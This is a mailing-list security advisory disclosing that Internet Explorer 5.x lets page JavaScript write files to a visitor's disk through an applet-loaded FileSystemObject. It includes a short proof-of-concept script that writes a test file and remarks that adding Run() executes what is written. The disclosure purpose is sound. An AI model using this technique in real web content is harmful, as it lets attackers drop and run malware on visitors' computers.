[Full-Disclosure] Internet Explorer JavaScript insecure function

[FREEBRAIN]

* Internet Explorer _javascript_ insecure function *   Product: Microsoft Internet Explorer Version: 5.x (probabily other versions may be affected)   ***   Problem:   I discovered a _javascript_ function (interpreted by Internet Explorer) called "file.writeline()" may be potentially dangerous for Internet Explorer users. This function allows to write files  by means of _javascript_ on a hard disk.   An attacker may use this function writting _javascript_ code in posts of forums, guestbooks, etc  for owning his victim's computers. With "file.writeline()" function the attacker can write trojans/virus/etc on his victim's hard disks, for example, an attacker may use _javascript_ "file.writeline()" function for writting a malicious file in VBS (Visual Basic Scripting) language.   I repeat, this may be potentially dangerous for Internet Explorer users.   NOTE: Actually a virus in the wild that affects to mIRC users is using this function ("file.writeline").   NOTE2: As you can see on the "Proof of concept", other functions are needed to carry out an "intrusion".   ***   Proof of concept:   InterfaceObject=document.applets[0]; setTimeout("Write()",1000); function Write() { fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}"; InterfaceObject.setCLSID(fsoClassID); fso = InterfaceObject.createInstance(); // windir = fso.getspecialfolder ;        filename = "\\proof.txt"; var filecontent = "Hello world"; file = fso.opentextfile(filename, "2", "TRUE"); file.writeline(filecontent) file.close();   }   This code writes a file called "proof.txt" in the hard disk, with the content "Hello world". Also you can execute files you write by means of _javascript_ adding "Run();" to the function.   ***   Solution:   I'm not sure about the solution but I recommend to upgrade to the last version of Internet Explorer. Also I recommend webmasters to forbid HTML codes that content this function in their forums, guestbooks, etc.   ***   Thanks to:   #disidents,#hackers @ irc-phoenix.org   #disidents,#sleepx,#ayuda_internet @ irc-hispano.org   Special thanks go to: Impos   (sorry my poor english)   ***   By FREEBRAIN   FREEBRAIN is a member of DisidentS Hacker Team   http://disidents-team.cjb.net (under construction) - http://www.gratisweb.com/disidents   <[EMAIL PROTECTED]>